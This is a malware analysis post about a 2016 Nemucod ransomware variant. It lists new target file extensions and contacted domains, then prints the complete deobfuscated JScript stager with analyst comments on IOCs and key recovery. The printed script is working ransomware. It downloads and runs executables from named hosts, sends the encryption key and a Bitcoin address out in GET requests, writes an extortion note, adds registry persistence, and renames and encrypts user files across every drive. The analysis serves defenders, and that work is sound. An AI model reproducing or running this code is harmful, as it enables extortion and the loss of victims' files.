Nemucod 28/Apr/2016

Quick analysis of a new variant of Nemucod retrieved by ReaQta (https://reaqta.com): 43 new extensions have been added: .3gp, .ai, .arc, .arj, .asf, .backup, .bak, .bz, .bz2 .bza, .bzip, .bzip2, .class, .djvu, .fb2, .flv, .gzip .h, .ice, .img, .iso, .java, .jpeg, .m3u, .mid, .midi .mkv, .mov, .mp3, .ogg, .pl, .pps, .py, .r00, .r01, .r02 .r03, .rm, .sql, .svg, .vob, .wav, .wma For a total of 122 (as opposed to the 79 of the version analysed a few days ago: https://reaqta.com/2016/04/nemucod-meets-7zip-to-launch-ransomware/). The new encryption routine works by taking as input the file to encrypt and a 36 alphanumeric string, the encryption is carried out using a custom xorer that XORs the first 1024 bytes of each targeted file. The key string is randomly generated, as opposed to the previous version where the key was hardcoded, and 7-zip is not used anymore. Even in this case if your firewall is logging GET requests, you'll be able to retrieve the key and decrypt back your files. Contacted domains: - blog.jergensthebeautifuldifference.ca - kalyonrobotik.com.tr - sswboiler.com - bucataria-sylviei.ro - revspec.com The deobfuscated Nemucod script is the following:

// Deobfuscated Nemucod stager (JScript for Windows Script Host), reformatted with
// analyst comments; every code token is unchanged from the paste above.
// Flow: fetch up to three payloads over plain HTTP, write a ransom note, add
// persistence and a .crypted file handler, then call the downloaded a0.exe once per
// matching file on every drive C: to Z:. The encryption routine itself is NOT in this
// script: it lives in a0.exe (described above as a XOR of the first 1024 bytes with ky).
var id = "LZIA9RQrgNju4fIBD7Z7HLghYohpv_GHeXSRTZSWHVbdZ__-IEZqqmzDJdhUezH8P7DntEc_2GdmdhBl"; // campaign/victim id, sent as id= on every C2 request
var ad = "1BsodiwfVRwnuniEGsPpaD8Xx1BcxDEFpX"; // Bitcoin address: written into the note and sent as ad= on every request
var bc = "0.46682"; // ransom amount (BTC) quoted in the note
var ld = 0; // index of the last host that served a payload; later status beacons go to ll[ld]
// Key: four 9-char slices of Math.random().toString(36), i.e. nominally 36 chars of
// [0-9a-z] (a slice can be shorter if toString(36) yields fewer than 11 chars).
// Math.random() is not a CSPRNG. Recovery points for responders: the key is sent in
// cleartext in the ky= query parameter of every GET below (any proxy/firewall log that
// keeps full URLs has it), and it is passed on the command line of every a0.exe call
// (process-creation / command-line auditing captures it too).
var ky = Math.random().toString(36).substr(2, 9) + Math.random().toString(36).substr(2, 9) + Math.random().toString(36).substr(2, 9) + Math.random().toString(36).substr(2, 9);
var cq = String.fromCharCode(34); // '"' built from a char code so the script contains no literal quotes inside commands
var cs = String.fromCharCode(92); // '\' likewise, used for paths and registry keys
var ll = ["blog.jergensthebeautifuldifference.ca", "kalyonrobotik.com.tr", "sswboiler.com", "bucataria-sylviei.ro", "revspec.com"]; // payload / C2 hosts, tried in order
var ws = WScript.CreateObject("WScript.Shell");
var fn = ws.ExpandEnvironmentStrings("%TEMP%") + cs + "a"; // %TEMP%\a : prefix for a.txt (note + run-once marker), a0.exe (encryptor), a1.exe / a2.exe
var xo = WScript.CreateObject("Msxml2.XMLHTTP"); // synchronous HTTP client (third arg of open() is false)
var xa = WScript.CreateObject("ADODB.Stream"); // binary stream used to write responseBody to disk
var fo = WScript.CreateObject("Scripting.FileSystemObject");
// The ransom note doubles as a run-once marker: if %TEMP%\a.txt already exists nothing below runs.
if (!fo.FileExists(fn + ".txt")) {
  // Three payload slots (n = 0,1,2 -> a0.exe, a1.exe, a2.exe). For each slot the host list
  // is walked starting from the last host that answered. rnd= is just i and n concatenated.
  for (var n = 0; n <= 2; n++) {
    for (var i = ld; i < ll.length; i++) {
      var dn = 0; // becomes 1 once this slot has been written to disk
      try {
        xo.open("GET", "http://" + ll[i] + "/counter/?ad=" + ad + "&ky=" + ky + "&id=" + id + "&rnd=" + i + n, false);
        xo.send();
        if (xo.status == 200) {
          xa.open();
          xa.type = 1; // adTypeBinary
          xa.write(xo.responseBody);
          // Replies of 1000 bytes or less are discarded (presumably error/placeholder pages).
          if (xa.size > 1000) {
            dn = 1;
            xa.saveToFile(fn + n + ".exe", 2); // 2 = adSaveCreateOverWrite
            // a1.exe / a2.exe are launched immediately (window style 1, no wait).
            // a0.exe is deliberately not run here: it is invoked later, once per file, as the encryptor.
            if (n != 0) {
              try { ws.Run(fn + n + ".exe", 1, 0); } catch (er) {};
            };
          };
          xa.close();
        };
        // Remember the working host and stop trying other hosts for this slot.
        if (dn == 1) { ld = i; break; };
      } catch (er) {}; // every network/COM error is swallowed; a dead host simply falls through to the next
    };
  };
  // Everything below requires the encryptor; a missing a1.exe / a2.exe does not stop the attack.
  if (fo.FileExists(fn + "0.exe")) {
    xo.open("GET", "http://" + ll[ld] + "/counter/?ad=" + ad + "&ky=" + ky + "&id=" + id + "&st=start", false); // "started" beacon
    xo.send();
    // Ransom note -> %TEMP%\a.txt. The "RSA-1024" wording is only note text: per the
    // analysis above, the routine in a0.exe is a 1024-byte XOR with ky.
    var fp = fo.CreateTextFile(fn + ".txt", true);
    fp.WriteLine("ATTENTION!");
    fp.WriteLine("");
    fp.WriteLine("All your documents, photos, databases and other important personal files");
    fp.WriteLine("were encrypted using strong RSA-1024 algorithm with a unique key.");
    fp.WriteLine("To restore your files you have to pay " + bc + " BTC (bitcoins).");
    fp.WriteLine("Please follow this manual:");
    fp.WriteLine("");
    fp.WriteLine("1. Create Bitcoin wallet here:");
    fp.WriteLine("");
    fp.WriteLine(" https://blockchain.info/wallet/new");
    fp.WriteLine("");
    fp.WriteLine("2. Buy " + bc + " BTC with cash, using search here:");
    fp.WriteLine("");
    fp.WriteLine(" https://localbitcoins.com/buy_bitcoins");
    fp.WriteLine("");
    fp.WriteLine("3. Send " + bc + " BTC to this Bitcoin address:");
    fp.WriteLine("");
    fp.WriteLine(" " + ad);
    fp.WriteLine("");
    fp.WriteLine("4. Open one of the following links in your browser to download decryptor:");
    fp.WriteLine("");
    // "Decryptor" links use the same /counter/ path on every host, keyed only by the BTC address (a=, not ad=).
    for (var i = 0; i < ll.length; i++) { fp.WriteLine(" http://" + ll[i] + "/counter/?a=" + ad); };
    fp.WriteLine("");
    fp.WriteLine("5. Run decryptor to restore your files.");
    fp.WriteLine("");
    fp.WriteLine("PLEASE REMEMBER:");
    fp.WriteLine("");
    fp.WriteLine(" - If you do not pay in 3 days YOU LOOSE ALL YOUR FILES.");
    fp.WriteLine(" - Nobody can help you except us.");
    fp.WriteLine(" - It`s useless to reinstall Windows, update antivirus software, etc.");
    fp.WriteLine(" - Your files can be decrypted only after you make payment.");
    fp.WriteLine(" - You can find this manual on your desktop (DECRYPT.txt).");
    fp.Close();
    // Persistence IOC: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Crypted = path of the note,
    // so the note is reopened at every logon (all ws.Run calls below are hidden: window style 0).
    ws.Run("%COMSPEC% /c REG ADD " + cq + "HKCU" + cs + "SOFTWARE" + cs + "Microsoft" + cs + "Windows" + cs + "CurrentVersion" + cs + "Run" + cq + " /V " + cq + "Crypted" + cq + " /t REG_SZ /F /D " + cq + fn + ".txt" + cq, 0, 0);
    // File-association IOC: HKCR\.crypted -> ProgID "Crypted", whose open command is
    // notepad.exe "<TEMP>\a.txt", so opening any encrypted file shows the note.
    // NOTE(review): writes under HKCR normally land in HKLM\Software\Classes and need admin
    // rights; whether they succeed for a standard user is not verified here.
    ws.Run("%COMSPEC% /c REG ADD " + cq + "HKCR" + cs + ".crypted" + cq + " /ve /t REG_SZ /F /D " + cq + "Crypted" + cq, 0, 0);
    ws.Run("%COMSPEC% /c REG ADD " + cq + "HKCR" + cs + "Crypted" + cs + "shell" + cs + "open" + cs + "command" + cq + " /ve /t REG_SZ /F /D " + cq + "notepad.exe " + cs + cq + fn + ".txt" + cs + cq + cq, 0, 0);
    // Copy the note to the desktop, trying two candidate locations (DECRYPT.txt is a file IOC).
    ws.Run("%COMSPEC% /c copy /y " + cq + fn + ".txt" + cq + " " + cq + "%AppData%" + cs + "Desktop" + cs + "DECRYPT.txt" + cq, 0, 0);
    ws.Run("%COMSPEC% /c copy /y " + cq + fn + ".txt" + cq + " " + cq + "%UserProfile%" + cs + "Desktop" + cs + "DECRYPT.txt" + cq, 0, 0);
    // 67..90 = 'C'..'Z': one hidden cmd.exe "for /r" per drive letter (A: and B: are skipped;
    // network shares are only reached if mapped to a letter). ws.Run(..., 0, 1) waits for each
    // cmd to finish, so drives are processed one after another. The 122 patterns include key
    // material (.ssh .pub .gpg .pgp), password databases (.kdb .kdbx), backups, source code and
    // VM images. Each match is first renamed to <name>.crypted and then a0.exe is called with
    // the new path and the cleartext key. REN and call are chained with "&", i.e. unconditionally,
    // so a file can end up renamed .crypted even if a0.exe failed on it -- check before assuming
    // every .crypted file is actually encrypted.
    for (var i = 67; i <= 90; i++) {
      ws.Run("%COMSPEC% /c for /r " + cq + String.fromCharCode(i) + ":" + cs + cq + " %i in (*.zip *.rar *.r00 *.r01 *.r02 *.r03 *.7z *.tar *.gz *.gzip *.arc *.arj *.bz *.bz2 *.bza *.bzip *.bzip2 *.ice *.xls *.xlsx *.doc *.docx *.pdf *.djvu *.fb2 *.rtf *.ppt *.pptx *.pps *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.class *.py *.pl *.h *.vb *.vcproj *.vbproj *.java *.bak *.backup *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.sql *.psd *.eps *.cdr *.cpt *.indd *.dwg *.ai *.svg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.jpeg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.mov *.3gp *.flv *.mkv *.vob *.rm *.mp3 *.wav *.asf *.wma *.m3u *.midi *.ogg *.mid *.vdi *.vmdk *.vhd *.dsk *.img *.iso) do (REN " + cq + "%i" + cq + " " + cq + "%~nxi.crypted" + cq + " & call " + fn + "0.exe " + cq + "%i.crypted" + cq + " " + ky + ")", 0, 1);
    };
    ws.Run("%COMSPEC% /c notepad.exe " + cq + fn + ".txt" + cq, 0, 0); // show the note
    xo.open("GET", "http://" + ll[ld] + "/counter/?ad=" + ad + "&ky=" + ky + "&id=" + id + "&st=done", false); // "done" beacon, again carrying the key
    xo.send();
  };
};